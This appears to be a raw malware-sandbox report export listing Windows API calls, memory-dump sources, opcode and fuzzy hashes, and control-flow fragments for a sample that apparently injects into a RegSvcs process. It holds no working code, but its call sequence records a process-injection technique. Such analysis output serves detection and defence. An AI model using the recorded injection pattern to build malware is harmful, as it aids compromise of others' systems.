                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FCC3D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 81211bf687cf45839edb1eb79bf6a8a8d1a6794ad50690e6e782cd2c7d006248
                                                                                            • Instruction ID: 4fa0b2314afe996b3f38def7adac2f132b3690295c5c13f2ee2bbe5b922cc504
                                                                                            • Opcode Fuzzy Hash: 81211bf687cf45839edb1eb79bf6a8a8d1a6794ad50690e6e782cd2c7d006248
                                                                                            • Instruction Fuzzy Hash: C92126B19002599FCB10DFAAD881ADEBBF5BF48320F10842DE558A7250C7749954CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: f4cdf52568d83f520a346eca0a09bcc96d4d492a7e5d45de4dc5068505d29053
                                                                                            • Instruction ID: 36cebaa39a7545b4911910ef8e31b97e82e15ed1e2f9816577e98c92ed1c7046
                                                                                            • Opcode Fuzzy Hash: f4cdf52568d83f520a346eca0a09bcc96d4d492a7e5d45de4dc5068505d29053
                                                                                            • Instruction Fuzzy Hash: 45215BB5D002498BCB10DFA9D9457EEFBF5EF88224F20845AD419A7250CB34A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FCC3D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 41ee275227c3905628c41837005f208ad66e36fce8962e1726d1a150ff0ca233
                                                                                            • Instruction ID: 508833269d58bfeeccfc336b47cffa715141c85f6f5c6f0ff6f067c9a2f26080
                                                                                            • Opcode Fuzzy Hash: 41ee275227c3905628c41837005f208ad66e36fce8962e1726d1a150ff0ca233
                                                                                            • Instruction Fuzzy Hash: BB2125B1D002599FCB10DFAAC885AEEFBF5FF48320F10842EE558A7250C7789944CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FCBD0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 47931cf2bb2dad30446ba5ccd89037d8edf7bab5853dab966c394a479434f243
                                                                                            • Instruction ID: 190935dc3f6bf2965d6765fa5af08ee31f8acceb041aad7d3978cd6dde4a8178
                                                                                            • Opcode Fuzzy Hash: 47931cf2bb2dad30446ba5ccd89037d8edf7bab5853dab966c394a479434f243
                                                                                            • Instruction Fuzzy Hash: D62138B1D002098FDB10DFAAC5857EEBBF4EF48324F10842DD459A7240CB789944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 6ee8bb49113ee7779ef903d18d1bc54f80184742bc7c5196ae4c8259198a9344
• Instruction ID: dcdd5f4a6f2fe90d48bfaccf86291452150056b0f2e43efcfbbafd84240a51e5
• Opcode Fuzzy Hash: 6ee8bb49113ee7779ef903d18d1bc54f80184742bc7c5196ae4c8259198a9344
• Instruction Fuzzy Hash: F82100B59002199FDB10CFAAD584ADEBBF5EF48324F14841AE819B3310C378A954CF60
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 008ca495d29e01fa7edbde1d5ec398dc8ad1d52b5a5f8c41b41d376834327fc1
• Instruction ID: 2fd8382cf7e42bc02f66b0326f66f6f40691e3e89cbfbd0bec76249744e62d3b
• Opcode Fuzzy Hash: 008ca495d29e01fa7edbde1d5ec398dc8ad1d52b5a5f8c41b41d376834327fc1
• Instruction Fuzzy Hash: 1821E4B59002189FDB10CF9AD584ADEBFF9EB48320F14841AE914A7350C374A944CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FCC20E
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: fde73cffe31ffff76c362d79616b1794e9aaadb0c7dfe2ee9d4981f6db982718
• Instruction ID: 0b26890563b9ce17876d8cb89b30d43498a66a72080298dd44113073baa0425d
• Opcode Fuzzy Hash: fde73cffe31ffff76c362d79616b1794e9aaadb0c7dfe2ee9d4981f6db982718
• Instruction Fuzzy Hash: 521159718002499FCB10DFAAD844ADFFFF5EF88324F108419E559A7250C7799544CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DAB161,00000800,00000000,00000000), ref: 00DAB372
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 09a53ac0a0aa9d2b94c3c2937a4c9daec2277b14018730533076c2e9002e8492
• Instruction ID: 00a65c77515ad9a99cfc093b287bc551892f55b84176df09e35689dad7717d6b
• Opcode Fuzzy Hash: 09a53ac0a0aa9d2b94c3c2937a4c9daec2277b14018730533076c2e9002e8492
• Instruction Fuzzy Hash: EA1112B69003089FCB10CF9AD448ADEFBF4EF49320F14842AE459A7211C3B5A945CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FCC20E
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 90aa89fa41146c49c7851ebe419d3c03e610195f4be4de6288c54329aa60fc55
• Instruction ID: 04947defa79414358faa24989610a4e56d11e8a92cb78c8adf4fd14e02cfb2e4
• Opcode Fuzzy Hash: 90aa89fa41146c49c7851ebe419d3c03e610195f4be4de6288c54329aa60fc55
• Instruction Fuzzy Hash: 651137B29002499FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C775A944CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DAB161,00000800,00000000,00000000), ref: 00DAB372
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 75288db0e10ba1b4767985d54891817f7218d90c508fc3983f14d93fdac972aa
• Instruction ID: c96294847fd2ce406e5f7613f7a85188c36bdb074c66a475b86f1e474c866eff
• Opcode Fuzzy Hash: 75288db0e10ba1b4767985d54891817f7218d90c508fc3983f14d93fdac972aa
• Instruction Fuzzy Hash: 8C1114B6D002499FDB10CF9AD448ADEFBF4EB48320F14852AD419A7210C375A545CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 42ce5f92b08a7c945ae0295fd2822679f4b2f71656b700ebb29b61dd13925658
• Instruction ID: 33d4822c8ab9605fc78d417b9efd5a1ca40f5341feec4dbc7d360012101015ae
• Opcode Fuzzy Hash: 42ce5f92b08a7c945ae0295fd2822679f4b2f71656b700ebb29b61dd13925658
• Instruction Fuzzy Hash: 4B1136B1D002498FCB20DFAAC5457EEFBF4EF88324F208429D559A7250CB79A944CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06FCF5C5
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 40233c32e607de6bf722e5bb7d70a8f9bab769a8a50996ea19cfed8b8d9a1061
• Instruction ID: 1073253ac9a1254ddd1352c2cfe1e35cf9f8ca52617b67d82cc9b955cc5f1833
• Opcode Fuzzy Hash: 40233c32e607de6bf722e5bb7d70a8f9bab769a8a50996ea19cfed8b8d9a1061
• Instruction Fuzzy Hash: 9311F2B58003499FDB10DF9AD948BDEFBF8EF48324F10885AE558A7600C375A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06FCF5C5
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: ae92e6dd5b6f3a9e5b9f2897efe16d66641384515815ad2331cca1cb73b73ee3
• Instruction ID: 975214cf6f489703fbb7c42bd687adb2394297b38f6eed5ba1c2abf30bb1807b
• Opcode Fuzzy Hash: ae92e6dd5b6f3a9e5b9f2897efe16d66641384515815ad2331cca1cb73b73ee3
• Instruction Fuzzy Hash: B81122B58002499FCB10CF9AD945BDEFFF8EB48324F10881AE558A7200C374A584CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00DAB0E6
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 7be66bbe36028269eb3e8e199dec84b8d5287b5f0e654635553e797ee55e2ffc
• Instruction ID: 8fe1154cd98226ccb582363a7366b4007472594b4f1da523d299532692c6168f
• Opcode Fuzzy Hash: 7be66bbe36028269eb3e8e199dec84b8d5287b5f0e654635553e797ee55e2ffc
• Instruction Fuzzy Hash: F0110FB6C003498FCB20CF9AD444ADEFBF4AF8A324F14842AD428B7210C379A545CFA5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1746307858.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_9740000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 138a7db30eeef17b2c104d79e17764d97db0654acf73e5722d16eb53b017a93f
• Instruction ID: 92cacb0415cb1b482d199319934b7018f8256c6cbca9dfba345f57466fb3f0b7
• Opcode Fuzzy Hash: 138a7db30eeef17b2c104d79e17764d97db0654acf73e5722d16eb53b017a93f
• Instruction Fuzzy Hash: A031A236909260CFE7248B24C8557797BE0AF45309F05849FF2ADCA593C3759856CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1315d6cf0cebaa13430a5277cf5c7b31905a93ac2f4431c3c03ea8afc6a5ee11
• Instruction ID: 2ed555a64fa1723420ebd327a6cfa17d01f37d59cdef55976a5cd8886c0220ef
• Opcode Fuzzy Hash: 1315d6cf0cebaa13430a5277cf5c7b31905a93ac2f4431c3c03ea8afc6a5ee11
• Instruction Fuzzy Hash: 4B213771504204DFDB05DF14E9C0B26BF66FB98324F24C169E9494B25AC336E856CFB2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738257058.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d4d000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b7874e9704090ee56a9e5c7c38025305e3de0214544ea7ad2b577f5468bb807b
• Instruction ID: ad0ee34cf5a9ba9794cef7341b29f796993442a603e3a3a6429d3bfb5ffb6445
• Opcode Fuzzy Hash: b7874e9704090ee56a9e5c7c38025305e3de0214544ea7ad2b577f5468bb807b
• Instruction Fuzzy Hash: 3C21FF71604240DFCB14DF24D984B26BBA6EB88314F24C5ADE84A4B296C33AD847CA71
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738257058.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d4d000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 135791ffac49803174b0ed8818ca6ea7885baf5fbf6087359f5d7d206852e5b6
• Instruction ID: 72f554617cd52018d89bfd436ff8c154a9d50b1680773de17686cbf8faee5e0c
• Opcode Fuzzy Hash: 135791ffac49803174b0ed8818ca6ea7885baf5fbf6087359f5d7d206852e5b6
• Instruction Fuzzy Hash: AE218E755093C08FCB02CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: fdd686fe210f0c3a74e795e4a9a35d95016ff8c05cb3db716288b13dc3068fc5
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction Fuzzy Hash: EF110372404240CFCB02CF10E9C4B16BF72FB94324F28C2A9D8090B256C33AE85ACFA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1746307858.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_9740000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5d95257790b848d91fad9d01b661d2d9028815c7f842eb6e58a00430cf72168
• Instruction ID: 82324b1abff3c1a6da59e253ffacda1036f508672f55c02743435905a468d36e
• Opcode Fuzzy Hash: c5d95257790b848d91fad9d01b661d2d9028815c7f842eb6e58a00430cf72168
• Instruction Fuzzy Hash: 89112937608652CFEB108B28E844778BBE1BF45316F09856BE2A9CB2D3C378C855CB11
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e7824ef040141988132e3ef5a40ca4559899b2e40326e76090d85b1aeff43627
• Instruction ID: 0c815ca4a360b01ed5c564dbb38f70e364ad1aba9288a69d0f314107b338a568
• Opcode Fuzzy Hash: e7824ef040141988132e3ef5a40ca4559899b2e40326e76090d85b1aeff43627
• Instruction Fuzzy Hash: 24012BB10083049AE7104A25DDC4767FFD9EF40325F2CC52AEC4A4A292C378DC40CE71
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 714138e49632d9c3227e616384d423bf6bf89e6dbe12aae42c5ef3d1fab1f14a
                                                                                            • Instruction ID: 9774c7de16d527c23f43ce5f32883f9712cbf090d4e9a737bfeb416ccc799eb9
                                                                                            • Opcode Fuzzy Hash: 714138e49632d9c3227e616384d423bf6bf89e6dbe12aae42c5ef3d1fab1f14a
                                                                                            • Instruction Fuzzy Hash: 8EF0C2710043449AE7108A16D884B66FFA8EF90734F18C55AED091E282C2799844CA70
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:3%
                                                                                            Dynamic/Decrypted Code Coverage:14.4%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:630
                                                                                            Total number of Limit Nodes:72

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: 1JA$rMA$rMA
                                                                                            • API String ID: 2738559852-782607585
                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 246 41a35a-41a3b1 call 41af60 NtCreateFile
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                                                            • Instruction ID: db9765c572d52390fb8604434ff9c67f718cda35ab6f8ca037d898e886166646
                                                                                            • Opcode Fuzzy Hash: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                                                            • Instruction Fuzzy Hash: 3601B2B2605218AFCB18CF89DC85EEB77ADEF8C754F158248FA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 249 41a360-41a376 250 41a37c-41a3b1 NtCreateFile 249->250 251 41a377 call 41af60 249->251 251->250
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 252: 41a53b-41a556; 253: 41a55c-41a57d NtAllocateVirtualMemory; 254: 41a557 call 41af60
                                                                                             • Edges: 252->253, 252->254, 254->253
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                                                            • Instruction ID: 2d8d7cd051b59848394cec9ab28889dd1b47d2bdb116ea822d79e9dc0c770f2c
                                                                                            • Opcode Fuzzy Hash: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                                                            • Instruction Fuzzy Hash: C8F0F8B5200108ABDB14DF99CC81EEB77A9EF8C354F158249BA0997241C634E921CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 255: 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 264: 41a490-41a4b9 call 41af60 NtClose
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 3: 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: 6EA
                                                                                            • API String ID: 1279760036-1400015478
                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
